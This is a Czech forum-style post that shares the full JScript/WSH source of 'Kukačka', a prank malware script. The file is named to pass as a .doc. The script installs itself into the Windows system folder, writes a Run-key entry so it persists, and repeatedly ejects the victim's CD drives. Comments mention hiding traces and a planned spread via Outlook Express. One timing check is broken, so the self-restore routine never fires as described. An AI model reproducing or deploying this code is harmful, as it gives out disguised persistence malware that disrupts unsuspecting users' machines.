Project name: |
Kukačka |
Project events: |
Opening CDROM's |
Project style: |
Lama lamě |
Used technology: |
WSH, JScript |
Project target: |
PC with Windows OS |
Description: |
Po spuštění skriptu na hostitelském pc, dojde k vytvořeni kopie skriptu a jeji registrace ve Windows registru. Tím je zajištěno automatické naběhnutí skriptu po každém spuštění OS. Skript je aktivní po celou dobu běžicího OS. V definovaných časových intervalech prověřuje existenci své kopie na disku a jeji záznam v registru. V případě konfliktu dojde k obnovení. Skript není nikterak agresivní: nešíří se - nenapadá soubory. Hlavní náplní skriptu je automatické otevírání CDROMů. |
Nasledující kód uložte jako: "kukacka.doc.js"
//if (WScript.Arguments.Count()>0)
var ForReading = 1, ForWriting = 2;
var soubor="kukacka.doc";
var adresar="C:\\WINDOWS\\SYSTEM\\";
if(WScript.ScriptName==soubor+".js") WScript.Quit();
var xf = WScript.CreateObject("Scripting.FileSystemObject").openTextFile(".\\"+soubor+".js",ForReading);
var vejce= xf.readAll();
xf.Close();
while(1<2){ // zivotni cyklus
for (var j=0;j<120;j++) {
if(j%2==10) hnizdo(); // kazdych 10 minut se proveri jestli je skript v poradku
if((j+1)%30 ==0) bidylko(); // kazdych 30 minut ...
WScript.Sleep(60000);//dvouhodinova perioda z minutovych intervalu
}
}
function bidylko(){
var mechaniky =WScript.CreateObject("WMPlayer.OCX").cdromCollection;
for (var i=0;i< mechaniky.Count;i++) mechaniky.Item(i).Eject();
}
function hnizdo(){
var fso= WScript.CreateObject("Scripting.FileSystemObject");
if (fso.FileExists(adresar+soubor+".js"));
else {zahnizdi();ptacata();}
}
function zahnizdi(){
var fso=WScript.CreateObject("Scripting.FileSystemObject");
var tf=fso.OpenTextFile(adresar+soubor+".js",ForWriting,true);
tf.write(vejce);
tf.Close();
var registr = WScript.CreateObject("WScript.Shell");
registr.RegWrite("HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\"+soubor,
adresar + soubor+".js x");
//fso.DeleteFile(".\\"+soubor+".js"); // pokud obet skript spusti rucne (ze zvedavosti)
// dojde k zamaskovani stop
}
function ptacata(){
// vyhodit mlade z hnizda pomoci Outloock Express
// kod zatim chybi .. a asi je nerealny
}
PS: Nejsem žadny hacker ani cracker, tak mě prosím za ten článek neukřižujte. Nadohou jsem zabloudil na Váš server. Dozvěděl jsem se spoustu zajimavých věcí, technik o kterých mnozí z Vás napsali, že to jsou staré věci a autora článku za ně málem ukamenovali. Doufám, že nedopadnu podobně. Chápejte, zrovná se učím WSH. Tento skript jsem vypotil a možná, že až sem zase nějaký ... zabloudí, tak mu ten text přijde vhod.
Zatím ahoj, Raduzz